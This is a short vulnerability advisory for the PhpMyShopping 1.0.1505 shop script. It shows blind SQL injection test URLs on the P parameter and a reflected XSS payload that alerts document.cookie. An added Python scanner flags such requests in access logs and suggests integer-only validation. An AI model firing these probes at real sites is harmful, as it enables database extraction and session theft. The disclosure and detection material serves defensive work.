PhpMyShopping 1.0.1505 cross site scripting remote blind SQL injection

2010.10.02
Credit: Metropolis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################################################################
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr
.:. Script : PhpMyShopping
.:. Version : v1.0.1505
.:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
.:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS
####################################################################

===[ Blind Sql Injection ]===

SQL Error => /detail_article.php?C=3&P=7'

www.site.com/detail_article.php?C=3&P=7 [Blind]

[Demo] :

www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true
www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false

===[ XSS ]===

www.site.com/detail_article.php?C=3&P=7 [XSS]

[Demo] :

www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>

####################################################################
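A log check for the requests shown above, as an added example that is not part of the original advisory: it flags requests to detail_article.php whose C or P value is not a plain integer. The log lines are constructed (combined log format is assumed), and the names `classify`, `scan` and the label heuristics are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; the request targets reuse the advisory's demo URLs.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Oct/2010:10:00:01 +0200] "GET /detail_article.php?C=3&P=7 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Oct/2010:10:00:07 +0200] "GET /detail_article.php?C=3&P=7' HTTP/1.1" 200 312
203.0.113.9 - - [02/Oct/2010:10:00:09 +0200] "GET /detail_article.php?C=3&P=1%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Oct/2010:10:00:10 +0200] "GET /detail_article.php?C=3&P=1%20and%201=2 HTTP/1.1" 200 2048
203.0.113.9 - - [02/Oct/2010:10:00:15 +0200] "GET /detail_article.php?C=3&P=7%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 5200
203.0.113.5 - - [02/Oct/2010:10:00:20 +0200] "GET /index.php?P=abc HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ID_PARAMS = ("C", "P")  # the two parameters that appear in the advisory's URLs
SQL_HINT = re.compile(r"'|\b(?:and|or|union|select)\b", re.I)  # coarse heuristic (assumption)

def classify(value):
    """Return None for a plain integer id, otherwise a coarse label for triage."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if re.search(r'[<>"]', value):
        return "markup"
    if SQL_HINT.search(value):
        return "sql"
    return "non-numeric"

def scan(log_text, script="/detail_article.php"):
    """Return (client, parameter, decoded value, label) for each non-integer C or P."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for name in ID_PARAMS:
            for value in params.get(name, []):
                label = classify(value)
                if label:
                    findings.append((client, name, value, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only test applied to C and P on the server side, before the value reaches the query or the page, is the input-validation counterpart of this check.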



Copyright 2019, cxsecurity.com

 
